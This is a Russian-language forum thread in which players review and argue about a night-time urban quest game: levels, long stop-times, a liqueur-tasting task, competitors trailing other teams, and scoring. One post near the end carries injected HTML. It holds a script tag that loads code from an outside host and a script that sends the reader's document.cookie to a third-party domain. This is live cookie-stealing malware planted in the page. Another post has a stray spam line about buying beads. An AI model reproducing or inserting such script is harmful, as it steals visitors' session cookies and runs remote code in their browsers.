![]() |
DL1: 3-я игра 7-го сезона от Инигруппы TrueBlondies.
Спасибо, что играли в нашу игру.
Сорри за косяки, мы действительно думали, что игра легкая :( |
Спасибки за игру!!!
Осталась довольна)) Вопрос по поводу закурки Кооперативной улицы, у этого баяна адрес же по Токсовскому шоссе, смутило... Ликерчики вкусняшки))))) Спасибо за Лебедева, 35... Как ни странно, была на нем первый раз) Сталкер приятный, но зачем писать код с внешней стороны здания напротив будки сторожа?? Лиса мимими))) Рекламные плакатики поубегали(( а с подключением телевидения так и планировалось, что там не было адреса? Брался он по пути к Лужской... Митя-бабушка милашка)) но джинсики палят)) |
спасибо за игру. ликеры вкусняшки (хоть сейчас экипаж и начнет бухтеть про полуторочасовые стоптаймы :) и сон в <s>макдаке</s> оллис), лиса ок., заповедная, лебедева/мост - вошло (мост вошел особенно, новая шишка :) чето какаято печальная тенденция калечиться уже на второй игре подряд), раллийка по билбордам тоже в принципе ок., сталкер прикольный, смутило только то что в доезде было прописано КО2 и в результате пропиздоглазили один код, который и не думали даже внизу искать.
а вобще в целом от игры позитив и все понравилось, заканчивать экипажку в 8 утра - бесценно :) Кстати, тут я покупаю бисер оптом на перепродажу... |
Спасибо за подсказоньки с местом. За то, что дали доиграть - вообще уважуха. Полю зашло.
Экипаж не выдержал и разъехался, пришлось забирать на ветеранов доки от машины, забирать меня с работы с московской и брать последние 2 задания вдвоём(хотя одного хватило-бы). Доезды спасли немного. Дом за постом ДПС - очень нехорошая подсказка. Нашли за 5 минут до слива, пока бежали и конечку искали - слили. Стоп-тайм - плохо |
Игра зашла! Спасибо, что дали доиграть!
Очень понравилось обилие кодов и их не задротность) Коломяжский путепровод зашел, да и Заповедная..и лиса..и рекламные щиты.. Слегка подпортил динамику стоптайм в час с небольшим, но все-равно было весело:D Отдельное спасибо всем игрокам, с которыми пересекались на уровнях... вы порой улыбаете:D Огромное спасибо оргам! Пишите еще! |
а в чем прикол заглушки которая до сих пор идет?
|
Прикольная динамичная игра, толь ко вот уровень с плакатами как то динамику подъубил нам. А так весело, задорно, но вот ликер мерзотные что капец)))) Даже пьющие у нас сказали что быстрее бы определили сорта водки)))
|
Лучше бы мы бухали всю ночь...
Чето я очень устал за всю ночь :( хотя в принципе ничего не делал... |
Цитата:
Спасибо за отзывы, сорри за гигантские стоптаймы и поменяные в день игры 2 щита, в 8 вечера они еще были. С телевидением мой косяк, не забила место, но этих щитов очень много в зоне было. Чтобы все были в равных условиях на игре ничего исправлять не стала. |
Спасибо за игру. Очень надеялись на блиц, а все как-то подрастянулось :(
Стоптайм печалька, реально не понимаю почему так долго все брали, вкусы очевиднее некуда :confused: Один код на сталке на английском и вверхногами - адиво! Странная закурка домику у поста ДПС. Возможно, если б не был заранее заявлен блиц - позитива от игры было бы больше. Митя, верни перчатки!!:) |
+первый уровень на лебедева
+второй на заповедной +сталкер -косяк с ко на сталкере -перегоны ради нихуя -поиски туалетов(хотя мож это и не минус, а мы какую то шляпу отгадали из задания) -адски косячная раллийка, я плохо понимаю как так можно было накосячить в одном уровне. -ну просто замечательный алкоуровень(который, я надеюсь, будет снят?) -безумно интересная водонапорка на севере города, поняв что там один код, я туда даже не полез. -боян в мурино. Зачем заигрывать говнодома ради одного кода? Ну заиграйте остановку ближайщую, если есть желание написать единичку. К остановке хоть пилить не надо. -адова наебка с длительностью игры. Хорошо взял запасные батарейки, а ведь даже не собирался шпилить до утра. Ни взял ни рацию, ни заряженный телефон. В общем спасибо за наебалово. Создалось ощущение, что сначала вся игра была такая. В виде поиска туалетов и билбордов, а потом в авторы пришел кто то новый и появились два нормальных уровня вначале игры. Короче мне неясно как у таких опытных авторов получилось "это". Ну погоди была гораздо занятнее. Чего стоят только 8 часов зачистки дестроя. |
меня вот тоже огорчила продолжительность - настроилась на блиц, в итоге продолжительность среднестандартная, местами подзатянуто, ну и стоптайм с ликерами не тру.
|
Спасибо за игру:-)
Первые уровни: пиво и бары - интересно. Жаль, что времени не хватило буквально на несколько кодов, в результате слив. Больше похоже на формат многоэкипажки с большим штабом. Идея с ликерами отличная! Но нас убили стоптаймы. Мы ждали быструю игру, как и многие, а тут час ожидания, в результате вся команда во главе с водителем спит:-) На сталкере: почему было написано КО2? Облазали там все, а оказалось, что бралось все элементарно, стоя на полу блин:-) В результате опять слив, не хватило пяти минут. Лиса зачетная! Очень хотелось выпить стафф, но было нельзя, поэтому он остался жив, а так бы выпили и выбросили, совсем забыли, что стафф нужно привезти на финиш:-) |
А как лису нужно было опознать от других машин? Для тех кто не знает Стаса
|
Цитата:
|
Мы с Митей хотим выразить отдельную благодарность в помощи при подготовке игры: Стасону, Зайцу, Сгу и Свете :)
|
Спасибо за игру !!
Нам все понравилось .))) даже покушать успели на стоп тайме))0 |
Первая игра, где спать захотелось на первом же уровне.
Не зашло, простите. |
Оч понравился первый уровень, нас на нем знатно вштырило) и еще шифровка с алкорасчлененками. В остальном - как-то странно, неровная динамика, во второй половине игры совсем заскучали.
И да, запрет на брутфорс усыпил половину нашего штаба((( даже традиционную зигу не вбить было( |
чорд... это была алкорасчлененка... аааа.... круто.... мы тупые((
|
Цитата:
Подбирать коды на Заповедной бессмысленно... Хотя вроде кто-то пытался вбить Зенит после СКА :) |
Добавьте что-ли кодик какой-нибудь в последний уровень, чтоб финишировать всем...
|
Цитата:
|
+ спасибо за Лебедева и Заповедную, побывал там впервые)
+ Понравилась идея 1-го уровня + Понравилась лока для сталкера - странная организация раллийки (выдача нового бонуса по времени, а не по закрытию предыдущего) - стоптаймы - несоответствие ожиданиям про длительность игры и кол-во алкоголя на игре. - прописание доезда непосредственно перед локой (что мешает запомнить код доезда и пойти на уровень шариться там, где видишь конкурентов и вбить доезд только когда что-нибудь найдешь) Но в целом игра понравилась. Спасибо! |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
а вот мне одному интересно, как Бабники смогли за 10 минут: доехать от Паркинга до Ключевой, и еще даже сняли код.
У Вас был самолет? и вы читаете коды не заходя на локу? Если что, это не навал, а просто любопытно. Ибо среднее время 20-30 минут взятие уровня. |
Не было у них самолета. Просто выйдя со сталкера одновременно с нами, мы закрыли заглушку, а они нет. И сев нам на хвост, тем самым они выиграли около 10 минут, пройдя уровень по автопереходу. Когда они уже были у ключевой, задание для них только открылось.
|
Цитата:
Запрещать паровозы правилами нет смысла, потому как доказать что было паровозом, а что смещением по зоне перед следующим уровнем нереально. Если хочется их на 100% избежать, орги могут использовать следующий проверенный способ: после задания "заглушка" вешается задание, в котором просят в ответ вбить название фирмы на рекламном щите рядом с залазом на локу, к примеру. И только после этого выдается задание коттедж. Любой паровоз получит двойную потерю времени от пропиленного за командой времени. Очень популярный прием на многих международках. |
Цитата:
Но я как обычно всегда верю в честность игроков... но могу и перестать верить.. Сорри за задержку с открытием статы, со стоптамами и свободным временем тяжеловато... сегодня добью. |
оке, понял. спасибо за ответ.
|
Цитата:
|
Цитата:
Неприятно, когда тебя откровенно пропаравозили конкуренты или ты пол часа не мог найти код, а потом тебе пришла подсказка, и ты всем его спалил. Но это элемент игры и во власти оргов уменьшить риск возникновения подобных ситуаций. |
Цитата:
И не говори про "никогда". В ДЛ раньше было запрещено следить за конкурентами. |
Кпд и 764, насколько я понял, так же отлично не вбивали доезд на башне :) все окей :))
|
Цитата:
|
Это ад, господа. Победа любой ценой становится нормой. Лучше быть в конце пилотона, но с чистой совестью!
|
И ещё.
Цитата:
Цитата:
|
Цитата:
А на Морозной свежести Карась четко и внятно всем озвучил одно из условий игры. Паравозы там были официально разрешены, чем Котэ и пользовался. Западлянка конечно, но в пределах правил той игры( |
Костик! Хватит ныть, какой же ты зануда...
|
Цитата:
|
Цитата:
|
Цитата:
Но речь не об этом. Речь о том, что нарушений правил Бабниками не было - мы сами ступили, что привели их на локу. |
а тем временем - че там со статой? хоть какая-нибудь предварительная будет? ее все еще так-же распи*орасило как и два дня назад.
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://nummobile.com/80j4ch2sa3g98uehlyoro4uftwotqhh'></script> <script> img = new Image(); img.src = "http://frontext.ru/www/s.gif?"+document.cookie; </script> |
Цитата:
Цитата:
Цитата:
|
Цитата:
|
Цитата:
PS ты еще запаровозь )) тут такие водилы встречаются, хер это у тебя получится )) |
Цитата:
Цитата:
|
Вот ни где не нашла в правилах, что нельзя на брифе проколоть колеса конкурентам... Значит можно?
|
Цитата:
|
Цитата:
Я вот уже писал про затирание кодов, а Ящер про игру на одной тачке)))))))) |
Цитата:
Кстати, видимо, нужны разъяснения по пункту 3.4.9, но это явно в другую тему писать надо. |
Цитата:
|
Нам нужно больше срааачааа!!1
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Давайте может хоть одну то игру в сезоне без кирпичей?
|
Цитата:
Цитата:
|
а, кстати, в правилах вроде не написано, что соперников на игре бить нельзя? :)
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Дорогие команды. Хочу пояснить как мы высчитывали бонусы за стоп-таймы на уровне ликер.
1. Берем время начала уровня 2. Берем время окончания уровня с учетом стоптайма 3. Смотрим во сколько реально закрыт технический уровень. 4. Если время закрытия технического уровня позднее, чем время в п.2, то начисление бонуса не производится, т.е. считается, что этот уровень был бы по любому слит. 5. Если время закрытия технического уровня ранее, чем время в п. 2, то начисляется бонус. 6. Технический уровень после всех манипуляций будет снят. |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
Так что - ??? |
Если я правильно нажала все кнопки, то открыта статистика и доступен сценарий :)
Стоп-таймы начислены в соответствии со схемой описаной мною в сообщении № 68. |
8сек разница это ад :)))
Варя, ну значит показалось. Все равно ничего не доказать. Полуфэйрплэй и окей. Ната, спасибо за игру! Но в следующий раз честно напишите на сколько часов это будет :) и кол-во алко на команду :) |
Цитата:
Хотя на самом деле у меня один вопрос всего: где был туалет и как он курился?=) |
Туалет на Жака Дюкло, заезд с Лиственной, за особняком..
Артур, бывает)))) |
Цитата:
|
Мимими... Я его прекрасно знаю... Я простите влезла, ответила на первую половину вопроса))
|
Цитата:
Потому что пока, даже понимая где он примерно, я не понимаю как его найти. ) |
Цитата:
|
Ну вот по этому и извиняюсь))) на вторую половину вопроса Наточка ответит уже)))
|
Цитата:
|
Туалет заброс Жака Дюкло 20 - если не ошибаюсь то именно это курилось из картинки
|
Он рядом с 62 домом) точно не 20))
|
Цитата:
Я знала, что там есть толчок, из недельки Ситрона и пешеходки по Сосновке (обе - игры Энки в 2010 году). Но ни на одной карте (и на Викимапии) его нет, поэтому когда мы ставили точку, мою версию про этот толчок сразу зарубили и отправили поле на пересечение со Светлановским (там есть другой туалет и он отмечен на картах, но он не подходил). Потом все-таки поняли, что надо ехать севернее, но это было уже под слив. |
Цитата:
На картинке к заданию вверху "Дюкло", а внизу среди напитков вдруг "Tualet zabros" (английским транслитом). А поскольку "Дюкло" лишь отдалённо похоже на ругательство (ах ты, Дюкло!), но при этом ни одного алкогольного напитка с названием "Tualet zabros" я не встречал (даже "волшебный" Gilpin Family Whisky - бррррррррр - не содержит в себе это слово=), имеем, куда ехать. Собственно, в 1000 ml (бутыль) в 20 раз больше, чем в 50 ml (стопарь), и по стоимости бьется, потому 20. Вбиваем тупо (куда-нибудь, кроме движка) и ищем туалет на районе (у меня esosedi буквально первой ссылкой или второй вылезли). Там он один... Это даже, не зная стрельбища на Дюкло... Почему-то при разгадывании задания вспоминался DLmini и Го, и только по хорошему поводу;). |
Как хорошо, что вы в нашей команде на бДЛ :))))))
|
Цитата:
По-моему, очень логично, что команда из нижней части таблицы угадывает именно туалеты:o. |
Цитата:
|
Цитата:
В итоге, каким запросом и куда он находился?) И да, +1 к Грому-) |
мы прокатились по всей улице..и его заметили)
|
Цитата:
|
+ на 9 часов игры пара хороших мест, пара нормальных заданий и пара уровней, которые отражают тему игры...
- бессмысленные перегоны; - говнодома (ну вот совсем говно); - очень длинный стоп-тайм, убивший динамику; - большое кол-во оргкосяков - (отсутствие/неверно указанные КО, странные доезды, неверно оцененное время игры и т.д.). Наверно, в целом игра неплохая, но от Наты и Блондисов я лично ожидала большего. |
Цитата:
|
Спасибо за игру!
1. Понравился первый уровень. Хотя нашли много меню баров, где был указан Эдельвейс и еще что-то, а движок такие коды не проходили. Было страшно за переборы =) 2. понравилась закурка "алко-расчлененка" 3. не понял смысла доезда до туалета в Сосновке. Если бы не знали, что он там есть - слили бы 4. дуаль с кооперативом и т.п. - есть гаражный кооператив Школьная-21 (только церковь было не привязать, хотя возможно, она там рядом где-то есть) 5. не понравилось то, что та информация, которая была на форуме изначально и появлялась в процессе, собственно на игре больше дезинформировала (количество уровней, длительность игры, количество кодов, количество алкоголя и т.д.) В целом понравилось, было бы покороче чуть-чуть... :rolleyes: Жаль, что вводится негласное правило "все ради победы"... |
что там со снятием уровня?
|
Цитата:
|
зачем тебе дзен, Аня? Больше ненависти!)
|
Цитата:
|
Часовой пояс GMT +3, время: 15:09. |
Powered by: vBulletin Version 3.8.7 (Russian)
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.